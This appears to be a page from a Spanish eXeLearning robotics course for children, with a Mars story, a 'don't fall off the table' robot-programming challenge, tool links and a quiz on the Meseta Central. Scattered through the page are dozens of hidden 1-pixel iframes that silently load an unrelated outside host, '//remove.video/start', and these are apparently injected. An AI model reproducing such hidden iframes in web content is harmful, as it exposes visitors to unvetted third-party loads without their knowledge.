<!DOCTYPE html>
<html lang="es" xml:lang="es" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Task twelve. ¡No me quiero despeñar! | Ayuda a Mara en su aventura marciana </title>
<meta name="author" content="Aurelio Gallardo Rodríguez" />
<link rel="license" type="text/html" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" />
<meta name="generator" content="eXeLearning 2.8.1 - exelearning.net" />
<link rel="stylesheet" type="text/css" href="base.css" />
<link rel="stylesheet" type="text/css" href="exe_effects.css" />
<link rel="stylesheet" type="text/css" href="content.css" />
<!--[if lt IE 9]><script type="text/javascript" src="exe_html5.js"></script><![endif]-->
<script type="text/javascript" src="exe_jquery.js"></script>
<script type="text/javascript" src="exe_effects.js"></script>
<script type="text/javascript" src="common_i18n.js"></script>
<script type="text/javascript" src="common.js"></script>
<link rel="stylesheet" type="text/css" href="udl-content.css" />
<script type="text/javascript" src="udl-content.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1" />
</head>
<body class="exe-ims" id="exe-node-44"><script type="text/javascript">document.body.className+=" js"</script>
<div id="outer">
<section id="main">
<header id="nodeDecoration"><div id="headerContent"><h1 id="nodeTitle">Task twelve. ¡No me quiero despeñar!</h1></div></header>
<article class="iDevice_wrapper FreeTextfpdIdevice" id="id213">
<div class="iDevice emphasis0">
<div id="ta213_154" class="block iDevice_content">

</div>
</div>
</article>
<article class="iDevice_wrapper CasestudyIdevice em_iDevice em_iDevice_casestudy" id="id215">
<div class="iDevice emphasis1" >
<header class="iDevice_header"><h1 class="iDeviceTitle">Caso práctico</h1></header>
<div class="iDevice_inner">
<div class="iDevice_content_wrapper">
<section id="ta215_94" class="block iDevice_content">
<p style="text-align: justify;">Mara, Nico y Mili regresan a la Tierra. ¡¡ La misión está cumplida !!</p>
<p style="text-align: justify;">Ahora serán otros los que colonicen el planeta Marte. Otras personas, otros robots. Se encontrarán una cueva con las suficientes infraestructuras como para poder sobrevivir durante largos períodos de tiempo.</p>
<p style="text-align: justify;">Mañana despegarán abandonando Marte y es la última noche que pasan en el planeta rojo. El sueño se apodera de Mara mientras recarga sus baterías, y su microprocesador le juega una mala pasada: está teniendo una pesadilla.</p>
<p style="text-align: justify;">"El robot alado Ingenuity la ha raptado para que no se marche (el pobre es que tiene pocos amigos) y la ha abandonado en una meseta casi en la cima del Monte Olimpo... ¡Hay que tener malos circuitos! ¡Mira que es alta esa montaña!</p>
<p style="text-align: justify;">Y la pobre Mara ya no sabe qué hacer. Se mueve por la meseta buscando una zona por la que bajar pero todas las paredes son endiabladamente escarpadas. Y con la poca batería que le queda... ¡SOS! ¡Grita por sus intercomunicadores! "</p>
<p style="text-align: justify;">Pero... ¡Uf, todo es un mal sueño! Y ya que se ha despertado (y comprobado que su batería está a tope) decide observar por última vez la noche marciana. Las estrellas la reciben con su cálida luz. Al cabo de un rato, observa como se mueven hacia ella dos luces brillantes: ¡son las luces del Ingenuity! En el fondo, ese roborcillo alado no es tan pedante. Viene a traerle a Mara un regalo de despedida: <strong>un cristal de olivino</strong>.</p>
<table style="width: 60%; border-style: hidden; margin-left: auto; margin-right: auto;" cellspacing="4" cellpadding="4" border="0">
<tbody>
<tr>
<td style="width: 50%; text-align: center; vertical-align: middle;"><iframe width="100%" height="200" style="border: 2px solid darkred; box-shadow: 10px 10px 5px #ccc; -moz-box-shadow: 10px 10px 5px #ccc; -webkit-box-shadow: 10px 10px 5px #ccc; -khtml-box-shadow: 10px 10px 5px #ccc;" src="https://mars.nasa.gov/embed/2094/"></iframe></td>
<td style="width: 50%; text-align: center; vertical-align: middle;"><iframe width="225" height="215" style="border: 2px solid darkred; box-shadow: 10px 10px 5px #ccc; -moz-box-shadow: 10px 10px 5px #ccc; -webkit-box-shadow: 10px 10px 5px #ccc; -khtml-box-shadow: 10px 10px 5px #ccc;" src="https://mars.nasa.gov/embed/7664/"></iframe><br /><br /><br /></td>
</tr>
<tr>
<td style="width: 50%; text-align: center; vertical-align: middle;">Cristales de Olivino. <a href="https://mars.nasa.gov/resources/2094/abundant-olivine/?site=msl" target="_blank" rel="noopener">NASA</a>. Dominio público.</td>
<td style="width: 50%; text-align: center; vertical-align: middle;">Viking 1 Orbiter Image Olympus Mons. <a href="https://mars.nasa.gov/resources/7664/viking-1-orbiter-image-olympus-mons/" target="_blank" rel="noopener">NASA</a>. Dominio público.</td>
</tr>
</tbody>
</table>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
</section>
<section id="taquesQuestion0b215" class="block iDevice_content">
<hr />
<table style="width: 100%; border-style: hidden; margin-left: auto; margin-right: auto;" cellspacing="4" cellpadding="4" border="0">
<tbody>
<tr>
<td style="width: 69.6459%;">
<p style="text-align: justify;"><span style="font-size: 14pt;">Lo que tendrás que conseguir es:</span></p>
<p style="text-align: justify; padding-left: 30px;"><span style="font-size: 14pt;">1. <span style="color: #800000;"><strong>Usar nuestro robot en modo kamikaze.  <span style="font-size: 24pt;">😳</span></strong></span></span><span style="font-size: 14pt;"><span style="color: #800000;"><strong></strong></span></span></p>
<p style="text-align: justify; padding-left: 30px;"><span style="font-size: 14pt; color: #000000;">2. Colocar sobre la mesa de trabajo una caja de grandes dimensiones, al revés. Reforzarla en la base con cinta celo de embalar. </span></p>
<p style="text-align: justify; padding-left: 30px;"><span style="font-size: 14pt; color: #000000;">3. Colocar nuestro robot encima; cuando se acerque al borde debe retroceder, girarse y dirigirse a otra parte de la caja.</span></p>
<p style="text-align: justify;"><span style="font-size: 14pt; color: #000000;">NOTA: se puede hacer en una mesa directamente... Pero como esté mal programado... ¡Se podrá despeñar! ¡Cuidado! </span></p>
<table style="width: 50%; border-style: hidden; margin-left: auto; margin-right: auto;" cellspacing="1" cellpadding="1" border="0">
<tbody>
<tr>
<td style="width: 55.4845%;">
<figure class="exe-figure exe-image position-center license-pd" style="width: 200px; text-align: center;"><img src="caja_bocaabajo.png" alt="Caja boca abajo" width="200" height="166" />
<figcaption class="figcaption"><a href="https://freesvg.org/vector-clip-art-of-cardboard-box-turned-around" target="_blank" class="author" rel="noopener">FREE SVG</a>. <span class="title"><em>cardboard box turned around</em></span> <span class="license"><span class="sep">(</span><span>Dominio público</span><span class="sep">)</span></span></figcaption>
</figure>
</td>
<td style="width: 44.5155%;">
<figure class="exe-figure exe-image position-center license-pd" style="width: 150px; text-align: center;"><img src="dangerFall.png" alt="Danger fall" width="150" height="137" />
<figcaption class="figcaption"><a href="https://freesvg.org/heavy-load-hazard-warning-sign-vector-image" target="_blank" class="author" rel="noopener">FREE SVG</a>. <span class="title"><em>Heavy load hazard warning sign</em></span> <span class="license"><span class="sep">(</span><span>Dominio público</span><span class="sep">)</span></span></figcaption>
</figure>
</td>
</tr>
</tbody>
</table>
</td>
<td style="width: 30.3541%; text-align: center;">
<figure class="exe-figure exe-media position-center license-custom" style="width: 320px;"><video width="320" height="240" style="border: 2px solid darkred; box-shadow: -10px -10px 5px #ccc; -moz-box-shadow: -10px -10px -5px #ccc; -webkit-box-shadow: -10px -10px -5px #ccc; -khtml-box-shadow: -10px -10px -5px #ccc;" controls="controls" class="mediaelement">
<source src="no_quiero_despennar.mp4" type="video/mp4" /></video>
<figcaption class="figcaption"><span class="author">Aurelio Gallardo.</span>. <span class="title"><em>Task 12. No me quiero despeñar.</em></span> <span class="license"><span class="sep">(</span><span class="custom-license">Elaboración propia.</span><span class="sep">)</span></span></figcaption>
</figure>
</td>
</tr>
</tbody>
</table>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div style="text-align: justify;"><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe width="300" height="150" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div>
</section>
<form name="feedback-form-quesFeedback0b215" action="#" onsubmit="return false" class="feedback-form">
<div class="block iDevice_buttons feedback-button js-required">
<p><script type="text/javascript">var feedbackquesFeedback0b215text = "Recursos de programación";</script><input type="button" name="toggle-feedback-quesFeedback0b215" value="Recursos de programación" class="feedbackbutton feedback-toggler" /></p>
</div>
<section id="feedback-quesFeedback0b215" class="feedback js-feedback js-hidden">
<h1 class="js-sr-av">Retroalimentación</h1>
<div class="exe-fx exe-paginated">
<h2>Entornos de programación robóticos</h2>
<ol>
<li><strong>Robot maqueen:</strong>  <a href="https://makecode.microbit.org/">https://makecode.microbit.org/</a>   (extensiones en makecode: <a href="https://youtu.be/gc2dKO50VO8">https://youtu.be/gc2dKO50VO8</a>)</li>
<li><strong>Robot masaylo,</strong> instalación del programa masayloblockly: <a href="https://clubroboticagranada.github.io/MASAYLO-CRG/masayloBlockly/descarga/">https://clubroboticagranada.github.io/MASAYLO-CRG/masayloBlockly/descarga/</a></li>
<li>Robots basados en arduino: <a href="http://www.arduinoblocks.com/">http://www.arduinoblocks.com/</a></li>
<li>Otros:
<ol>
<li>Mblock: <a href="https://www.makeblock.es/soporte/mblock/">https://www.makeblock.es/soporte/mblock/</a></li>
<li>Open Roberta lab: <a href="https://lab.open-roberta.org/#">https://lab.open-roberta.org/#</a></li>
</ol>
</li>
</ol>
<h2>Entornos de programación de sistemas físicos: microbit y arduino</h2>
<ol>
<li>Para arduino (programación por bloques): <a href="http://www.arduinoblocks.com/">http://www.arduinoblocks.com/</a> , <a href="http://www.tinkercad.com">www.tinkercad.com</a> (circuitos), <a href="http://www.visualino.net/index.es.html">http://www.visualino.net/index.es.html</a> (antiguo).</li>
<li>Para microbit (programación por bloques):  <a href="https://makecode.microbit.org/,">https://makecode.microbit.org/</a> , <a href="http://www.tinkercad.com">www.tinkercad.com</a> y <a href="https://scratch.mit.edu/">https://scratch.mit.edu/</a></li>
<li>Para arduino (código): <a href="https://www.arduino.cc/en/software">https://www.arduino.cc/en/software</a> . Referencia del IDE: <a href="https://www.arduino.cc/reference/en/">https://www.arduino.cc/reference/en/</a></li>
<li>Otros para arduino (más técnicos): <a href="https://processing.org/">https://processing.org/</a> , <a href="https://code.visualstudio.com/">https://code.visualstudio.com/</a></li>
<li>Otros:
<ol>
<li>ScratchX: <a href="https://scratchx.org/">https://scratchx.org/</a></li>
<li>Open Roberta lab: <a href="https://lab.open-roberta.org/#">https://lab.open-roberta.org/#</a></li>
</ol>
</li>
</ol>
<h2>Simuladores</h2>
<ol>
<li><a href="https://vr.vex.com/">https://vr.vex.com/</a></li>
<li><a href="http://gazebosim.org/">http://gazebosim.org/</a></li>
<li><a href="https://colobot.info/">https://colobot.info/</a></li>
<li><a href="https://gears.aposteriori.com.sg/">https://gears.aposteriori.com.sg/</a></li>
<li>Y más: <a href="https://juegosrobotica.es/podcast-045/">https://juegosrobotica.es/podcast-045/</a></li>
</ol>
</div></section>
</form>
</div>
</div>
</div>
</article>
<article class="iDevice_wrapper readingIdevice em_iDevice em_iDevice_reading" id="id58">
<div class="iDevice emphasis1" >
<header class="iDevice_header"><h1 class="iDeviceTitle">¿Existe alguna meseta en la península ibérica?</h1></header>
<div class="iDevice_inner">
<div class="iDevice_content_wrapper">
<section id="ta58_226_4" class="block iDevice_content">
<p>Lectura sobre la meseta en España:</p>
<p style="text-align: center;"><a href="https://www.entrecumbres.com/sistemas-montanosos/meseta-central/" target="_blank" rel="noopener">La meseta central</a></p>
</section>
<section id="ta58_226_5" class="block iDevice_content">
<p>Lee detenidamente el documento y contesta a la pregunta:</p>
<ol>
<li>¿En qué dos grandes zonas se divide la meseta central?</li>
<li>¿Qué dos cordilleras atraviesan la meseta central?</li>
<li>¿Qué tres grandes ríos atraviesan la meseta central?</li>
</ol>
</section>
<form name="feedback-form-58_226_6" action="#" onsubmit="return false" class="feedback-form">
<div class="block iDevice_buttons feedback-button js-required">
<p><script type="text/javascript">var feedback58_226_6text = "Mostrar retroalimentación";</script><input type="button" name="toggle-feedback-58_226_6" value="Mostrar retroalimentación" class="feedbackbutton feedback-toggler" /></p>
</div>
<section id="feedback-58_226_6" class="feedback js-feedback js-hidden">
<h1 class="js-sr-av">Retroalimentación</h1>
<ol>
<li>Submeseta Norte y Submeseta Sur</li>
<li>Sistema central y Montes de Toledo.</li>
<li>Duero (Sub. Norte) y Tajo y Guadiana (Sub. Sur)</li>
</ol></section>
</form>
</div>
</div>
</div>
</article>
<article class="iDevice_wrapper UDLcontentIdevice em_iDevice em_iDevice_udl_exp_cuestionario" id="id216">
<div class="iDevice emphasis1" >
<header class="iDevice_header" style="background-image:url(icon_udl_exp_cuestionario.svg)"><h1 class="iDeviceTitle">Proceso para llevar a cabo la tarea</h1></header>
<div class="iDevice_inner">
<div class="iDevice_content_wrapper">
<div id="ta216_112_2" class="block iDevice_content">
<div class="exe-udlContent exe-udlContent-expression"><section class="exe-udlContent-block js-hidden"><header class="exe-udlContent-header exe-udlContent-character-4"><h2>Razona el algoritmo</h2></header><div class="exe-udlContent-content"><div class="exe-udlContent-content-main"><p style="text-align: center;"><span style="font-size: 14pt;">Para llegar a hacer este programa necesitas razonar el algoritmo. <em><strong>¿Qué tal si diseñas un diagrama de flujo?</strong></em> </span><span style="font-size: 14pt;"></span></p>
<p style="text-align: center;"><span style="font-size: 14pt;">Si has llegado a esta última tarea, ya sabes todo los que necesitas saber... ¡Solo piénsalo!</span></p>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div></div></div></section><section class="exe-udlContent-block js-hidden"><header class="exe-udlContent-header exe-udlContent-character-2"><h2>Cómo trabajar</h2></header><div class="exe-udlContent-content"><div class="exe-udlContent-content-main"><ol>
<li><span style="font-size: 14pt;">Normalmente se trabaja en parejas o en pequeños grupos, con un robot y un ordenador para programarlo.</span></li>
<li><span style="font-size: 14pt;">Aunque tu compañero/a sea quien maneje el ordenador o el robot, intenta siempre entender lo que estáis programando o haciendo: las órdenes o bloques que se están usando, el tiempo que tardan en ejecutarse, el orden en el que se colocan los bloques en el programa...</span></li>
<li><span style="font-size: 14pt;">Compartir las ideas con los demás, colaborar en lograr el reto,&nbsp; no molestar a otros grupos si están probando o trabajando...</span></li>
<li><span style="font-size: 14pt;"><strong>Importante: ¡ten cuidado con las pruebas! </strong>Intenta no equivocarte porque como se te despeñe el robot...<br></span></li>
<li><span style="font-size: 14pt;">Si no sale a la primera, no desanimarse. Es normal que haya que hacer varias pruebas hasta que salga.</span></li>
</ol>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><span style="font-size: 14pt;"><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></span></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div></div></div></section><section class="exe-udlContent-block js-hidden"><header class="exe-udlContent-header exe-udlContent-character-3"><h2>Pistas</h2></header><div class="exe-udlContent-content"><div class="exe-udlContent-content-main"><p><span style="font-size: 14pt;">La clave para el éxito está en:</span></p>
<ol>
<li><span style="font-size: 14pt;">Pensar siempre, a priori, qué estamos haciendo.&nbsp;</span></li>
<li><span style="font-size: 14pt;">Averiguar los bloques de programación necesarios.</span></li>
<li><span style="font-size: 14pt;">Deducir el diagrama de flujo ANTES de escribir el programa. <br></span></li>
<li><span style="font-size: 14pt;">Haz las cosas paso a paso: no pasar al paso siguiente hasta no tener seguro el anterior.</span></li>
</ol>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><span style="font-size: 14pt;"><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></span></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
